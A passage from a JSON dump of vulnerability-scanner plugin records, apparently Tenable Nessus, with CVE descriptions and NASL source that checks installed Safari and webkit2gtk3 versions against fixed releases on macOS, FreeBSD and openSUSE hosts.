\"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"webkit2-gtk3<2.16.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T03:39:38", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X\nhost is prior to 10.1.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An information disclosure vulnerability exists in the\n WebKit component due to improper handling of SVG filters.\n An unauthenticated, remote attacker can exploit this,\n via a timing side-channel attack, to disclose sensitive\n cross-domain information. (CVE-2017-7006)\n\n - An unspecified flaw exists that allows an\n unauthenticated, remote attacker to spoof the address\n bar via a specially crafted website. (CVE-2017-7011)\n\n - Multiple memory corruption issues exists in the 'WebKit\n Web Inspector' component due to improper validation of\n input. An unauthenticated, remote attacker can exploit\n these issues, via a specially crafted web page, to\n execute arbitrary code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - Multiple cross-site scripting (XSS) vulnerabilities\n exist in the WebKit component in the DOMParser due to\n improper validation of user-supplied input before\n returning it to users. An unauthenticated, remote\n attacker can exploit these issue, via a specially\n crafted URL, to execute arbitrary script code in a\n user's browser session. (CVE-2017-7038, CVE-2017-7059)\n\n - A denial of service vulnerability exists in the Safari\n Printing component. An unauthenticated, remote attacker\n can exploit this, via a specially crafted web page, to\n create an infinite number of print dialogs.\n (CVE-2017-7060)\n\n - An unspecified memory initialization flaw exists in\n WebKit. A local attacker can exploit this, via a\n specially crafted application, to disclose restricted\n memory. (CVE-2017-7064)", "edition": 27, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-24T00:00:00", "title": "macOS : Apple Safari < 10.1.2 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7038", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7060", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7011", "CVE-2017-7006", "CVE-2017-7059", "CVE-2017-7030", "CVE-2017-7041"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:apple:safari"], "id": "MACOSX_SAFARI10_1_2.NASL", "href": "https://www.tenable.com/plugins/nessus/101931", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101931);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/14 1:59:37\");\n\n script_cve_id(\n \"CVE-2017-7006\",\n \"CVE-2017-7011\",\n \"CVE-2017-7012\",\n \"CVE-2017-7018\",\n \"CVE-2017-7019\",\n \"CVE-2017-7020\",\n \"CVE-2017-7030\",\n \"CVE-2017-7034\",\n \"CVE-2017-7037\",\n \"CVE-2017-7038\",\n \"CVE-2017-7039\",\n \"CVE-2017-7040\",\n \"CVE-2017-7041\",\n \"CVE-2017-7042\",\n \"CVE-2017-7043\",\n \"CVE-2017-7046\",\n \"CVE-2017-7048\",\n \"CVE-2017-7049\",\n \"CVE-2017-7052\",\n \"CVE-2017-7055\",\n \"CVE-2017-7056\",\n \"CVE-2017-7059\",\n \"CVE-2017-7060\",\n \"CVE-2017-7061\",\n \"CVE-2017-7064\"\n );\n script_bugtraq_id(\n 99885,\n 99886,\n 99887,\n 99888,\n 99890\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-07-19-5\");\n script_xref(name:\"ZDI\", value:\"ZDI-17-489\");\n\n script_name(english:\"macOS : Apple Safari < 10.1.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X\nhost is prior to 10.1.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An information disclosure vulnerability exists in the\n WebKit component due to improper handling of SVG filters.\n An unauthenticated, remote attacker can exploit this,\n via a timing side-channel attack, to disclose sensitive\n cross-domain information. (CVE-2017-7006)\n\n - An unspecified flaw exists that allows an\n unauthenticated, remote attacker to spoof the address\n bar via a specially crafted website. (CVE-2017-7011)\n\n - Multiple memory corruption issues exists in the 'WebKit\n Web Inspector' component due to improper validation of\n input. An unauthenticated, remote attacker can exploit\n these issues, via a specially crafted web page, to\n execute arbitrary code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - Multiple cross-site scripting (XSS) vulnerabilities\n exist in the WebKit component in the DOMParser due to\n improper validation of user-supplied input before\n returning it to users. An unauthenticated, remote\n attacker can exploit these issue, via a specially\n crafted URL, to execute arbitrary script code in a\n user's browser session. (CVE-2017-7038, CVE-2017-7059)\n\n - A denial of service vulnerability exists in the Safari\n Printing component. An unauthenticated, remote attacker\n can exploit this, via a specially crafted web page, to\n create an infinite number of print dialogs.\n (CVE-2017-7060)\n\n - An unspecified memory initialization flaw exists in\n WebKit. A local attacker can exploit this, via a\n specially crafted application, to disclose restricted\n memory. (CVE-2017-7064)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207921\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2017/Jul/39\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 10.1.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_Safari31.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X or macOS\");\n\nif (!preg(pattern:\"Mac OS X 10\\.(10|11|12)([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X Yosemite 10.10 / Mac OS X El Capitan 10.11 / macOS Sierra 10.12\");\n\ninstalled = get_kb_item_or_exit(\"MacOSX/Safari/Installed\", exit_code:0);\npath = get_kb_item_or_exit(\"MacOSX/Safari/Path\", exit_code:1);\nversion = get_kb_item_or_exit(\"MacOSX/Safari/Version\", exit_code:1);\n\nfixed_version = \"10.1.2\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n \"Path\", path,\n \"Installed version\", version,\n \"Fixed version\", fixed_version\n ),\n ordered_fields:make_list(\"Path\", \"Installed version\", \"Fixed version\")\n );\n security_report_v4(port:0, severity:SECURITY_HOLE, extra:report, xss:true);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Safari\", version, path);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:31:25", "description": "This update for webkit2gtk3 to version 2.18.0 fixes the following\nissues :\n\nThese security issues were fixed :\n\n - CVE-2017-7039: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7018: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7030: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7037: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7034: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7055: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7056: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7064: An issue was fixed that allowed remote\n attackers to bypass intended memory-read restrictions\n via a crafted app (bsc#1050469).\n\n - CVE-2017-7061: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7048: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7046: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-2538: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1045460)\n\n - CVE-2017-2496: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website.\n\n - CVE-2017-2539: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website.\n\n - CVE-2017-2510: An issue was fixed that allowed remote\n attackers to conduct Universal XSS (UXSS) attacks via a\n crafted website that improperly interacts with pageshow\n events.\n\n - CVE-2017-2365: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site\n (bsc#1024749)\n\n - CVE-2017-2366: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2373: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2363: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site\n (bsc#1024749)\n\n - CVE-2017-2362: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2350: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site\n (bsc#1024749)\n\n - CVE-2017-2350: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2354: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749).\n\n - CVE-2017-2355: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (uninitialized memory access and application\n crash) via a crafted website (bsc#1024749)\n\n - CVE-2017-2356: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2371: An issue was fixed that allowed remote\n attackers to launch popups via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2364: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site\n (bsc#1024749)\n\n - CVE-2017-2369: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2016-7656: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7635: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7654: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7639: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7645: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7652: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7641: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7632: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7599: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site that used\n HTTP redirects (bsc#1020950)\n\n - CVE-2016-7592: An issue was fixed that allowed remote\n attackers to obtain sensitive information via crafted\n JavaScript prompts on a website (bsc#1020950)\n\n - CVE-2016-7589: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7623: An issue was fixed that allowed remote\n attackers to obtain sensitive information via a blob URL\n on a website (bsc#1020950)\n\n - CVE-2016-7586: An issue was fixed that allowed remote\n attackers to obtain sensitive information via a crafted\n website (bsc#1020950)\n\nFor other non-security fixes please check the changelog.\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-13T00:00:00", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2017-1268)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2369", "CVE-2017-7034", "CVE-2017-7064", "CVE-2017-2355", "CVE-2017-7056", "CVE-2016-7599", "CVE-2017-7055", "CVE-2016-7654", "CVE-2017-2539", "CVE-2017-2363", "CVE-2016-7623", "CVE-2016-7645", "CVE-2017-2366", "CVE-2016-7589", "CVE-2016-7586", "CVE-2017-2538", "CVE-2017-2365", "CVE-2017-7037", "CVE-2017-7018", "CVE-2016-7641", "CVE-2016-7635", "CVE-2017-7061", "CVE-2017-2371", "CVE-2016-7652", "CVE-2017-7048", "CVE-2016-7632", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-2496", "CVE-2017-2364", "CVE-2017-2350", "CVE-2017-2373", "CVE-2017-2356", "CVE-2016-7639", "CVE-2016-7592", "CVE-2016-7656", "CVE-2017-2510", "CVE-2017-2362", "CVE-2017-7030", "CVE-2017-2354"], "modified": "2017-11-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit", "cpe:/o:novell:opensuse:42.3", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo"], "id": "OPENSUSE-2017-1268.NASL", "href": "https://www.tenable.com/plugins/nessus/104526", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1268.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104526);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-7586\", \"CVE-2016-7589\", \"CVE-2016-7592\", \"CVE-2016-7599\", \"CVE-2016-7623\", \"CVE-2016-7632\", \"CVE-2016-7635\", \"CVE-2016-7639\", \"CVE-2016-7641\", \"CVE-2016-7645\", \"CVE-2016-7652\", \"CVE-2016-7654\", \"CVE-2016-7656\", \"CVE-2017-2350\", \"CVE-2017-2354\", \"CVE-2017-2355\", \"CVE-2017-2356\", \"CVE-2017-2362\", \"CVE-2017-2363\", \"CVE-2017-2364\", \"CVE-2017-2365\", \"CVE-2017-2366\", \"CVE-2017-2369\", \"CVE-2017-2371\", \"CVE-2017-2373\", \"CVE-2017-2496\", \"CVE-2017-2510\", \"CVE-2017-2538\", \"CVE-2017-2539\", \"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2017-1268)\");\n script_summary(english:\"Check for the openSUSE-2017-1268 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.18.0 fixes the following\nissues :\n\nThese security issues were fixed :\n\n - CVE-2017-7039: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7018: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7030: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7037: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7034: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7055: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7056: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7064: An issue was fixed that allowed remote\n attackers to bypass intended memory-read restrictions\n via a crafted app (bsc#1050469).\n\n - CVE-2017-7061: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7048: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7046: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-2538: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1045460)\n\n - CVE-2017-2496: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website.\n\n - CVE-2017-2539: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website.\n\n - CVE-2017-2510: An issue was fixed that allowed remote\n attackers to conduct Universal XSS (UXSS) attacks via a\n crafted website that improperly interacts with pageshow\n events.\n\n - CVE-2017-2365: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site\n (bsc#1024749)\n\n - CVE-2017-2366: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2373: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2363: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site\n (bsc#1024749)\n\n - CVE-2017-2362: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2350: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site\n (bsc#1024749)\n\n - CVE-2017-2350: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2354: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749).\n\n - CVE-2017-2355: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (uninitialized memory access and application\n crash) via a crafted website (bsc#1024749)\n\n - CVE-2017-2356: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2371: An issue was fixed that allowed remote\n attackers to launch popups via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2364: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site\n (bsc#1024749)\n\n - CVE-2017-2369: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2016-7656: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7635: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7654: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7639: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7645: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7652: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7641: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7632: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7599: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted web site that used\n HTTP redirects (bsc#1020950)\n\n - CVE-2016-7592: An issue was fixed that allowed remote\n attackers to obtain sensitive information via crafted\n JavaScript prompts on a website (bsc#1020950)\n\n - CVE-2016-7589: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7623: An issue was fixed that allowed remote\n attackers to obtain sensitive information via a blob URL\n on a website (bsc#1020950)\n\n - CVE-2016-7586: An issue was fixed that allowed remote\n attackers to obtain sensitive information via a crafted\n website (bsc#1020950)\n\nFor other non-security fixes please check the changelog.\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020950\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1024749\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1045460\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1050469\"\n );\n # https://features.opensuse.org/323744\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://features.opensuse.org/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", 